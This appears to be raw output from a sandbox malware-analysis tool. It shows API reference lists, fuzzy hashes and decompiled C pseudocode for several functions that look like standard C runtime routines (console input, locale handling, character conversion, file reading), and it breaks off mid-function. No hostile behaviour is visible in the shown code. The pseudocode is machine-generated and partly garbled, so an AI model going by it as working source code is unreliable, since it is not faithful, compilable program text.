                0x00eafc1e
                0x00eafc22
                0x00eafc24
                0x00eafc30
                0x00eafc32
                0x00eafc32
                0x00eafc26
                0x00eafc28
                0x00eafc28
                0x00000000
                0x00eafc24
                0x00eafafd
                0x00eafb00
                0x00eafb03
                0x00000000
                0x00000000
                0x00eafb05
                0x00000000
                0x00eafb05
                0x00eafa7c
                0x00eafa7c
                0x00eafa82
                0x00eafa83
                0x00000000
                0x00eafa88
                0x00eafa51
                0x00eafa2f
                0x00eaf913
                0x00eaf8f0
                0x00eaf8f5
                0x00eaf8d0
                0x00eaffcc
                0x00eaffd1
                0x00eaffd1
                0x00eaffd1
                0x00000000
                0x00eaf915
                0x00eaf915
                0x00000000
                0x00eaf915
                0x00eaf913

                APIs
                • __malloc_crt.LIBCMT ref: 00EAF933
                • GetConsoleMode.KERNEL32(00000080,?,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?,00000080,00000003), ref: 00EAFA46
                • ReadConsoleW.KERNEL32(?,?,G+,?,00000000,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47), ref: 00EAFA72
                • GetLastError.KERNEL32(?,?,?,?,?,?,00000001,00000000,?,?,?,?,?,?,00EB2B47,?), ref: 00EAFA7C
                • __dosmaperr.LIBCMT ref: 00EAFA83
                • _free.LIBCMT ref: 00EAFD52
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Console$ErrorLastModeRead__dosmaperr__malloc_crt_free
                • String ID: G+$G+
                • API String ID: 3470617983-4250722411
                • Opcode ID: 9bc12f135d991661ec766742846922babf27493db312549ae8e0eb6085badcc1
                • Instruction ID: 8ad9a3cb26877d49196f97b2105841c718f8084deb61371a1af45866c828a03a
                • Opcode Fuzzy Hash: 9bc12f135d991661ec766742846922babf27493db312549ae8e0eb6085badcc1
                • Instruction Fuzzy Hash: 8C41F870E146858ECB26CF9D9C84BE9BBE1AF0B308F055175E858AF2B2C631DD0AC750
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 65%
                			E00EA5641(void* __eax, intOrPtr __ebx, short __ecx, void* __edx, signed int __edi, signed int* __esi, void* __eflags) {
                				void* _t39;
                				signed int _t40;
                				signed int _t43;
                				void* _t46;
                				signed int _t48;
                				intOrPtr* _t52;
                				signed int _t60;
                				signed short _t61;
                				signed int _t63;
                				signed int _t64;
                				signed int _t65;
                				signed int _t67;
                				intOrPtr _t70;
                				signed int _t72;
                				void* _t79;
                				void* _t81;
                				void* _t93;
                				intOrPtr* _t96;
                				void* _t97;
                				signed int _t98;
                				void* _t100;
                				void* _t101;
                				void* _t104;
                				void* _t105;
                				void* _t106;
                				void* _t107;
                
                				_t95 = __esi;
                				_t92 = __edi;
                				_t91 = __edx;
                				_t82 = __ecx;
                				_t80 = __ebx;
                				asm("adc eax, [ecx+0x682af3]");
                				 *((intOrPtr*)(__ecx + 0x5be9f3)) =  *((intOrPtr*)(__ecx + 0x5be9f3)) + __eax;
                				 *((intOrPtr*)(__ecx + 0xa881e9)) =  *((intOrPtr*)(__ecx + 0xa881e9)) + __eax;
                				 *((intOrPtr*)(__ecx - 0x7f)) =  *((intOrPtr*)(__ecx - 0x7f)) + __ecx;
                				_push(__eax);
                				_push(__edi);
                				_push(__eax);
                				if(__eflags == 0) {
                					_t39 = E00EBE1D4(__ecx, __edx);
                				} else {
                					_t39 = E00EBEA44(__edx);
                				}
                				_t101 = _t100 + 0xc;
                				if(_t39 == 0) {
                					_t40 = E00EBA06A(_t95);
                					_pop(_t82);
                					__eflags = _t40;
                					if(_t40 == 0) {
                						_t43 = L00EB5727( *((intOrPtr*)(_t98 - 0x1e8)), 0x55, _t80, E00EB5609(_t80) + 1);
                						__eflags = _t43;
                						if(_t43 != 0) {
                							goto L30;
                						} else {
                							__eflags = 0;
                							goto L2;
                						}
                					} else {
                						_t60 = E00EB9FDB(_t95, 0x20001004, _t98 - 0x1dc, 2);
                						_t104 = _t101 + 0x10;
                						__eflags = _t60;
                						if(_t60 == 0) {
                							L13:
                							_t61 = GetACP();
                							 *(_t98 - 0x1dc) = _t61;
                						} else {
                							_t61 =  *(_t98 - 0x1dc);
                							__eflags = _t61;
                							if(_t61 == 0) {
                								goto L13;
                							}
                						}
                						 *_t92 = _t61 & 0x0000ffff;
                						_t92 =  *((intOrPtr*)(_t98 - 0x1e4)) + 1;
                						_t63 = L00EB5727( *((intOrPtr*)(_t98 - 0x1d4)), 0x83, _t95,  *((intOrPtr*)(_t98 - 0x1e4)) + 1);
                						_t105 = _t104 + 0x10;
                						__eflags = _t63;
                						if(_t63 != 0) {
                							goto L30;
                						} else {
                							_t64 = L00EB5727(_t80,  *((intOrPtr*)(_t98 + 0x18)), _t95, _t92);
                							_t106 = _t105 + 0x10;
                							__eflags = _t64;
                							if(_t64 != 0) {
                								goto L30;
                							} else {
                								_t65 = L00EB5727( *((intOrPtr*)(_t98 - 0x1e8)), 0x55, _t95, _t92);
                								_t107 = _t106 + 0x10;
                								__eflags = _t65;
                								if(_t65 != 0) {
                									goto L30;
                								} else {
                									_t92 = 0x83;
                									goto L18;
                								}
                							}
                						}
                					}
                				} else {
                					_t92 = 0x83;
                					_push(_t98 - 0x1d0);
                					E00EB7294(_t80, _t82, _t91, 0x83,  *((intOrPtr*)(_t98 - 0x1d4)), 0x83);
                					_t107 = _t101 + 0xc;
                					if(_t80 == 0) {
                						L18:
                						_t80 = 0;
                						__eflags =  *_t95;
                						if( *_t95 == 0) {
                							L22:
                							_t82 = 0;
                							__eflags = 0;
                							 *((short*)( *((intOrPtr*)(_t98 - 0x1e0)))) = 0;
                							goto L23;
                						} else {
                							_t70 =  *((intOrPtr*)(_t98 - 0x1e4));
                							__eflags = _t70 - _t92;
                							if(_t70 >= _t92) {
                								goto L22;
                							} else {
                								_t72 = L00EB5727( *((intOrPtr*)(_t98 - 0x1e0)), _t92, _t95, _t70 + 1);
                								_t107 = _t107 + 0x10;
                								__eflags = _t72;
                								if(_t72 == 0) {
                									L23:
                									_t92 =  *(_t98 - 0x1f0);
                									__eflags = _t92;
                									if(_t92 != 0) {
                										E00EB32E0(_t92,  *((intOrPtr*)(_t98 - 0x1d8)), 4);
                										_t107 = _t107 + 0xc;
                									}
                									_t80 =  *((intOrPtr*)(_t98 - 0x1d4));
                									_t95 =  *(_t98 - 0x1ec);
                									_t67 = E00EB55AD( *(_t98 - 0x1ec),  *((intOrPtr*)(_t98 + 0x10)),  *((intOrPtr*)(_t98 - 0x1d4)));
                									__eflags = _t67;
                									if(_t67 != 0) {
                										goto L30;
                									} else {
                										L2:
                										_pop(_t93);
                										_pop(_t97);
                										__eflags =  *(_t98 - 4) ^ _t98;
                										_pop(_t81);
                										return E00EB1E0D(_t81,  *(_t98 - 4) ^ _t98, _t91, _t93, _t97);
                									}
                								} else {
                									_push(0);
                									_push(0);
                									_push(0);
                									_push(0);
                									_push(0);
                									goto L31;
                								}
                							}
                						}
                					} else {
                						_t79 = L00EB5727(_t80,  *((intOrPtr*)(_t98 + 0x18)), _t98 - 0xb0, E00EB5609(_t98 - 0xb0) + 1);
                						_t107 = _t107 + 0x14;
                						if(_t79 == 0) {
                							goto L18;
                						} else {
                							L30:
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							_push(0);
                							L31:
                							E00EAEB49(_t80, _t91);
                							asm("int3");
                							_push(8);
                							_push(0xecc538);
                							_t46 = E00EAF1E0(_t80, _t92, _t95);
                							_t96 =  *((intOrPtr*)(_t98 + 8));
                							if(_t96 != 0) {
                								_t48 = E00EB20A9(_t82, 0xd);
                								 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
                								_t84 =  *((intOrPtr*)(_t96 + 4));
                								if( *((intOrPtr*)(_t96 + 4)) != 0) {
                									asm("lock xadd [ecx], eax");
                									if((_t48 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t96 + 4)) != 0xeceac8) {
                										E00EB2248( *((intOrPtr*)(_t96 + 4)));
                										_pop(_t84);
                									}
                								}
                								 *(_t98 - 4) = 0xfffffffe;
                								E00EB78AF();
                								if( *_t96 != 0) {
                									E00EB20A9(_t84, 0xc);
                									 *(_t98 - 4) = 1;
                									E00EB4248( *_t96);
                									_t52 =  *_t96;
                									if(_t52 != 0 &&  *_t52 == 0 && _t52 != 0xece800) {
                										E00EB40EE(_t52);
                									}
                									 *(_t98 - 4) = 0xfffffffe;
                									E00EB78BB();
                								}
                								_t46 = E00EB2248(_t96);
                							}
                							return E00EAF225(_t46);
                						}
                					}
                				}
                			}

                APIs
                • ___get_qualified_locale_downlevel.LIBCMT ref: 00EB765E
                  • Part of subcall function 00EBEA44: _memset.LIBCMT ref: 00EBEA7A
                  • Part of subcall function 00EBEA44: GetUserDefaultLCID.KERNEL32(?,?,00000055), ref: 00EBEB5D
                  • Part of subcall function 00EBEA44: IsValidCodePage.KERNEL32(00000000), ref: 00EBEBB1
                  • Part of subcall function 00EBEA44: IsValidLocale.KERNEL32(?,00000001), ref: 00EBEBC4
                  • Part of subcall function 00EBEA44: ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 00EBEBE3
                  • Part of subcall function 00EBEA44: ___crtDownlevelLCIDToLocaleName.LIBCMT ref: 00EBEBFE
                  • Part of subcall function 00EBEA44: GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 00EBEC17
                  • Part of subcall function 00EBEA44: GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00EBEC2E
                • ___get_qualified_locale.LIBCMT ref: 00EB7665
                • __invoke_watson.LIBCMT ref: 00EB7807
                • __lock.LIBCMT ref: 00EB7826
                • _free.LIBCMT ref: 00EB784C
                • __lock.LIBCMT ref: 00EB7865
                • ___removelocaleref.LIBCMT ref: 00EB7874
                • ___freetlocinfo.LIBCMT ref: 00EB788D
                • _free.LIBCMT ref: 00EB78A0
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Locale$DownlevelInfoNameValid___crt__lock_free$CodeDefaultPageUser___freetlocinfo___get_qualified_locale___get_qualified_locale_downlevel___removelocaleref__invoke_watson_memset
                • String ID:
                • API String ID: 326597126-0
                • Opcode ID: 74ceaa93ed26513bf724ab8611d67c8cecb507a695a828ee7681fd132f52846a
                • Instruction ID: 225c511abe74d94d6a60d0bfd0a376a575d76ec378454b8244fe096110d399d4
                • Opcode Fuzzy Hash: 74ceaa93ed26513bf724ab8611d67c8cecb507a695a828ee7681fd132f52846a
                • Instruction Fuzzy Hash: A6313971509315AADB38ABA09D0AFEB33E8AF80314F18356EF494B69D2CF35DE41C651
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E00EA6AE0(void* __ecx, signed int __edx) {
                				intOrPtr _t44;
                				void* _t56;
                				void* _t62;
                				signed int _t72;
                				signed int _t73;
                				signed int _t76;
                				intOrPtr _t78;
                				signed int _t83;
                				void* _t84;
                
                				_t76 = __edx;
                				_t62 = E00EB22C8(__ecx, __edx);
                				_t87 = _t62;
                				if(_t62 == 0) {
                					L24:
                					return E00EAF225(_t78);
                				} else {
                					memcpy(_t62,  *( *((intOrPtr*)(_t84 - 0x20)) + 0x68), 0x88 << 2);
                					_t83 = 0;
                					 *_t62 = 0;
                					_t78 = E00EB48E9(_t76,  *( *((intOrPtr*)(_t84 - 0x20)) + 0x68) + 0x110, _t87,  *((intOrPtr*)(_t84 + 8)), _t62);
                					 *((intOrPtr*)(_t84 + 8)) = _t78;
                					if(_t78 != 0) {
                						__eflags = _t78 - 0xffffffff;
                						if(_t78 == 0xffffffff) {
                							__eflags = _t62 - 0xeceac8;
                							if(_t62 != 0xeceac8) {
                								E00EB2248(_t62);
                							}
                							 *((intOrPtr*)(E00EAF100())) = 0x16;
                						}
                						goto L24;
                					}
                					_t44 =  *((intOrPtr*)(_t84 - 0x20));
                					_t70 =  *(_t44 + 0x68);
                					asm("lock xadd [ecx], edx");
                					if((_t76 | 0xffffffff) == 0) {
                						_t70 =  *(_t44 + 0x68);
                						if( *(_t44 + 0x68) != 0xeceac8) {
                							E00EB2248(_t70);
                							_pop(_t70);
                							_t44 =  *((intOrPtr*)(_t84 - 0x20));
                						}
                					}
                					 *(_t44 + 0x68) = _t62;
                					asm("lock xadd [ebx], eax");
                					if(( *( *((intOrPtr*)(_t84 - 0x20)) + 0x70) & 0x00000002) == 0 && ( *0xecee10 & 0x00000001) == 0) {
                						E00EB20A9(_t70, 0xd);
                						 *(_t84 - 4) = _t83;
                						 *0xecfcd4 =  *((intOrPtr*)(_t62 + 4));
                						 *0xecfcd8 =  *((intOrPtr*)(_t62 + 8));
                						 *0xecfce8 =  *((intOrPtr*)(_t62 + 0x21c));
                						_t72 = _t83;
                						while(1) {
                							 *(_t84 - 0x1c) = _t72;
                							if(_t72 >= 5) {
                								break;
                							}
                							 *((short*)(0xecfcdc + _t72 * 2)) =  *((intOrPtr*)(_t62 + 0xc + _t72 * 2));
                							_t72 = _t72 + 1;
                						}
                						_t73 = _t83;
                						while(1) {
                							 *(_t84 - 0x1c) = _t73;
                							__eflags = _t73 - 0x101;
                							if(_t73 >= 0x101) {
                								goto L14;
                							}
                							 *((char*)(_t73 + 0xece8c0)) =  *((intOrPtr*)(_t73 + _t62 + 0x18));
                							_t73 = _t73 + 1;
                						}
                						while(1) {
                							L14:
                							 *(_t84 - 0x1c) = _t83;
                							__eflags = _t83 - 0x100;
                							if(_t83 >= 0x100) {
                								break;
                							}
                							 *((char*)(_t83 + 0xece9c8)) =  *((intOrPtr*)(_t83 + _t62 + 0x119));
                							_t83 = _t83 + 1;
                						}
                						__eflags = _t73 | 0xffffffff;
                						asm("lock xadd [eax], ecx");
                						if((_t73 | 0xffffffff) == 0) {
                							_t56 =  *0xececec; // 0xeceac8
                							__eflags = _t56 - 0xeceac8;
                							if(_t56 != 0xeceac8) {
                								E00EB2248(_t56);
                							}
                						}
                						 *0xececec = _t62;
                						asm("lock xadd [ebx], eax");
                						 *(_t84 - 4) = 0xfffffffe;
                						E00EB48B3();
                					}
                					goto L24;
                				}
                			}













                APIs
                • __malloc_crt.LIBCMT ref: 00EB477C
                  • Part of subcall function 00EB22C8: _malloc.LIBCMT ref: 00EB22D9
                • __setmbcp_nolock.LIBCMT ref: 00EB47A3
                  • Part of subcall function 00EB48E9: getSystemCP.LIBCMT ref: 00EB4901
                  • Part of subcall function 00EB48E9: setSBCS.LIBCMT ref: 00EB490E
                • _free.LIBCMT ref: 00EB47D2
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • __lock.LIBCMT ref: 00EB4801
                • _free.LIBCMT ref: 00EB488F
                • _free.LIBCMT ref: 00EB48CC
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLastSystem__lock__malloc_crt__setmbcp_nolock_malloc
                • String ID:
                • API String ID: 3263399035-0
                • Opcode ID: 95653d2b22185e1ec2de5d8aaff2f1006cb9be2cd416f85251df426ea65378ee
                • Instruction ID: 5b47843d5672c3e6c1e9ddbe36e0649cf0816162a67ac3f501faebf8120e6b0e
                • Opcode Fuzzy Hash: 95653d2b22185e1ec2de5d8aaff2f1006cb9be2cd416f85251df426ea65378ee
                • Instruction Fuzzy Hash: 9D41DAB4A002848FDB19DF68D481AEA77E4BB05324B14516DF955BB7E3CB359C42CB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 87%
                			E00EA6B5A(void* __edx, void* __esi, void* __eflags) {
                				void* _t8;
                				void* _t9;
                				void* _t10;
                
                				_t9 = __esi;
                				_t8 = __edx;
                				asm("loopne 0xffffff8b");
                				if(__eflags != 0) {
                					E00EB0A4B();
                				} else {
                					if( *((intOrPtr*)(_t10 - 0x1c)) == 0) {
                						E00EB0ADE(__esi);
                					}
                					E00EB0A3C(_t8);
                				}
                				 *((intOrPtr*)(_t10 - 4)) = 0xfffffffe;
                				return E00EAF225(_t9);
                			}







                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __amsg_exit$__cinit__wsetenvp__wwincmdln_doexit
                • String ID:
                • API String ID: 2587630013-0
                • Opcode ID: 344c1ff1ac66235cbc6626bc53989c47ba6ee416d5cb28026ab77ac35ced7a00
                • Instruction ID: d097b58567ac583a1fbb4bc13346af363cfbc39e784798e3def6faa5e6ee9351
                • Opcode Fuzzy Hash: 344c1ff1ac66235cbc6626bc53989c47ba6ee416d5cb28026ab77ac35ced7a00
                • Instruction Fuzzy Hash: EEF0C230A0031268DA2877B15C03BEF25C45F1B365F1438A5F805FE2C3DE58FA414266
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00EBA436(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                				char _v8;
                				intOrPtr _v12;
                				signed int _v20;
                				signed int _t35;
                				int _t38;
                				signed int _t41;
                				int _t42;
                				intOrPtr* _t44;
                				int _t47;
                				short* _t49;
                				intOrPtr _t50;
                				intOrPtr _t54;
                				int _t55;
                				signed int _t59;
                				char* _t62;
                
                				_t62 = _a8;
                				if(_t62 == 0) {
                					L5:
                					return 0;
                				}
                				_t50 = _a12;
                				if(_t50 == 0) {
                					goto L5;
                				}
                				if( *_t62 != 0) {
                					E00EB2DB9( &_v20, _a16);
                					_t35 = _v20;
                					__eflags =  *(_t35 + 0xa8);
                					if( *(_t35 + 0xa8) != 0) {
                						_t38 = E00EBA1C7( *_t62 & 0x000000ff,  &_v20);
                						__eflags = _t38;
                						if(_t38 == 0) {
                							__eflags = _a4;
                							_t41 = _v20;
                							_t59 = 1;
                							_t28 = _t41 + 4; // 0x840ffff8
                							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                							__eflags = _t42;
                							if(_t42 != 0) {
                								L21:
                								__eflags = _v8;
                								if(_v8 != 0) {
                									_t54 = _v12;
                									_t31 = _t54 + 0x70;
                									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                									__eflags =  *_t31;
                								}
                								return _t59;
                							}
                							L20:
                							_t44 = E00EAF100();
                							_t59 = _t59 | 0xffffffff;
                							__eflags = _t59;
                							 *_t44 = 0x2a;
                							goto L21;
                						}
                						_t59 = _v20;
                						__eflags =  *(_t59 + 0x74) - 1;
                						if( *(_t59 + 0x74) <= 1) {
                							L15:
                							_t20 = _t59 + 0x74; // 0xe1c11fe1
                							__eflags = _t50 -  *_t20;
                							L16:
                							if(__eflags < 0) {
                								goto L20;
                							}
                							__eflags = _t62[1];
                							if(_t62[1] == 0) {
                								goto L20;
                							}
                							L18:
                							_t22 = _t59 + 0x74; // 0xe1c11fe1
                							_t59 =  *_t22;
                							goto L21;
                						}
                						_t12 = _t59 + 0x74; // 0xe1c11fe1
                						__eflags = _t50 -  *_t12;
                						if(__eflags < 0) {
                							goto L16;
                						}
                						__eflags = _a4;
                						_t17 = _t59 + 0x74; // 0xe1c11fe1
                						_t18 = _t59 + 4; // 0x840ffff8
                						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                						_t59 = _v20;
                						__eflags = _t47;
                						if(_t47 != 0) {
                							goto L18;
                						}
                						goto L15;
                					}
                					_t55 = _a4;
                					__eflags = _t55;
                					if(_t55 != 0) {
                						 *_t55 =  *_t62 & 0x000000ff;
                					}
                					_t59 = 1;
                					goto L21;
                				}
                				_t49 = _a4;
                				if(_t49 != 0) {
                					 *_t49 = 0;
                				}
                				goto L5;
                			}



















                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00EBA46C
                • __isleadbyte_l.LIBCMT ref: 00EBA49A
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00EBA4C8
                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00EBA4FE
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID: >,
                • API String ID: 3058430110-1189350311
                • Opcode ID: a975d527b8109d81b9a55d9f50db0c0c35dda6eb7e6c78e679fadb0cb3c61c5c
                • Instruction ID: 3f7fa0d411fbacbc6bf87f3495abeb898d0c7c80f3767f1aabdf3aa844e6c0e9
                • Opcode Fuzzy Hash: a975d527b8109d81b9a55d9f50db0c0c35dda6eb7e6c78e679fadb0cb3c61c5c
                • Instruction Fuzzy Hash: 9831CF30600246AFDF218F65C848BFB7BA5FF41314F199139F865A7190E770E950DB92
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E00EB721D(void* __ebx, void* __edi, intOrPtr _a4) {
                				char* _v24;
                				intOrPtr _v28;
                				signed int _v36;
                				signed int _v40;
                				short _v300;
                				void* __esi;
                				void* _t15;
                				void* _t17;
                				signed int _t20;
                				char* _t22;
                				signed int _t30;
                				void* _t33;
                				void* _t40;
                				void* _t42;
                				void* _t46;
                				void* _t47;
                				void* _t49;
                				void* _t51;
                				signed int _t52;
                
                				if(_a4 != 0) {
                					_push(__ebx);
                					_t30 = E00EBDBB1(_a4, 0x55);
                					_pop(_t33);
                					if(_t30 < 0x55) {
                						_push(__edi);
                						_t15 = E00EB22C8(_t33, _t40, 2 + _t30 * 2);
                						_t42 = _t15;
                						if(_t42 != 0) {
                							_t5 = _t30 + 1; // 0x1
                							_t17 = L00EB5727(_t42, _t5, _a4, _t5);
                							_t52 = _t51 + 0x10;
                							if(_t17 != 0) {
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								E00EAEB49(_t30, _t40);
                								asm("int3");
                								_t49 = _t47;
                								_push(_t49);
                								_t50 = _t52;
                								_t20 =  *0xece400; // 0xbb40e64e
                								_v40 = _t20 ^ _t52;
                								_t22 = _v24;
                								_t45 = _v28;
                								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
                									E00EB7973(_t30, _t40, _t45,  &_v300);
                								}
                								_pop(_t46);
                								return E00EB1E0D(_t30, _v36 ^ _t50, _t40, _t42, _t46);
                							} else {
                								_t15 = _t42;
                								goto L5;
                							}
                						} else {
                							L5:
                							goto L6;
                						}
                					} else {
                						_t15 = 0;
                						L6:
                						return _t15;
                					}
                				} else {
                					return 0;
                				}
                			}























                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.532402262.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000002.00000002.532394919.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532428548.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532441093.0000000000ECE000.00000008.00000001.01000000.00000004.sdmp
                • Associated: 00000002.00000002.532448854.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: 23e1c046823912b29c524a230eda23809f47ca41349b5e50e374bef1e01f98c7
                • Instruction ID: 622e5a34df4c7055181c6a58499c0bb5ece341e994d90cad7854b7bdbad77b6c
                • Opcode Fuzzy Hash: 23e1c046823912b29c524a230eda23809f47ca41349b5e50e374bef1e01f98c7
                • Instruction Fuzzy Hash: 76212B7120C208AEEB109A649C46FFB33ECDBC5764F505565F948F6990FA61EE008690
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 96%
                			E00EA622B(signed int __ebx, signed int __edx, intOrPtr* __edi, signed int __esi) {
                				intOrPtr _t83;
                				signed char _t84;
                				intOrPtr _t86;
                				signed int _t87;
                				signed char _t89;
                				signed int _t90;
                				signed int _t92;
                				long _t100;
                				signed int _t105;
                				char _t106;
                				char _t107;
                				signed int _t109;
                				char* _t113;
                				void* _t114;
                				void* _t117;
                				void* _t118;
                				void* _t119;
                				signed int _t122;
                				signed int _t123;
                				intOrPtr _t125;
                				void* _t126;
                				intOrPtr _t127;
                				intOrPtr _t129;
                				signed int _t136;
                				signed int _t138;
                				intOrPtr* _t140;
                				signed int _t142;
                				char* _t144;
                				signed int _t145;
                				signed char* _t147;
                				int _t148;
                				signed int _t149;
                				void* _t150;
                				void* _t152;
                				void* _t165;
                
                				_t145 = __esi;
                				_t140 = __edi;
                				_t136 = __edx;
                				_t122 = __ebx;
                				while(1) {
                					L12:
                					_t140 = _t140 + 1;
                					if(ReadFile( *( *((intOrPtr*)(0xecf230 + _t136 * 4)) + _t122), _t150 - 1, 1, _t150 - 0x14, 0) != 0 || GetLastError() == 0) {
                						goto L14;
                					}
                					L29:
                					_t136 =  *(_t150 - 0xc);
                					_t126 = 0xd;
                					 *_t145 = _t126;
                					_t145 = _t145 + 1;
                					L24:
                					while(_t140 <  *((intOrPtr*)(_t150 - 0x1c))) {
                						_t83 =  *_t140;
                						__eflags = _t83 - 0x1a;
                						if(_t83 == 0x1a) {
                							_t127 =  *((intOrPtr*)(0xecf230 + _t136 * 4));
                							_t84 =  *(_t127 + _t122 + 4);
                							__eflags = _t84 & 0x00000040;
                							if((_t84 & 0x00000040) != 0) {
                								 *_t145 =  *_t140;
                								_t145 = _t145 + 1;
                								__eflags = _t145;
                							} else {
                								 *(_t127 + _t122 + 4) = _t84 | 0x00000002;
                							}
                						} else {
                							__eflags = _t83 - _t126;
                							if(_t83 == _t126) {
                								__eflags = _t140 -  *((intOrPtr*)(_t150 - 0x1c)) - 1;
                								if(_t140 >=  *((intOrPtr*)(_t150 - 0x1c)) - 1) {
                									goto L12;
                								} else {
                									_t113 = _t140 + 1;
                									__eflags =  *_t113 - 0xa;
                									if( *_t113 != 0xa) {
                										 *_t145 = _t126;
                										_t140 = _t113;
                										_t145 = _t145 + 1;
                									} else {
                										_t114 = 0xa;
                										_t140 = _t140 + 2;
                										 *_t145 = _t114;
                										L28:
                										_t145 = _t145 + 1;
                									}
                								}
                							} else {
                								 *_t145 = _t83;
                								_t145 = _t145 + 1;
                								_t140 = _t140 + 1;
                							}
                							continue;
                						}
                						L33:
                						_t38 = _t150 - 0x10; // 0xeb2b47
                						_t86 =  *_t38;
                						_t142 = _t145 - _t86;
                						if( *((char*)(_t150 + 0x13)) != 1 || _t142 == 0) {
                							L58:
                							_t123 =  *(_t150 - 0x18);
                						} else {
                							_t147 = _t145 - 1;
                							_t89 =  *_t147;
                							if(_t89 < 0) {
                								_t90 = _t89 & 0x000000ff;
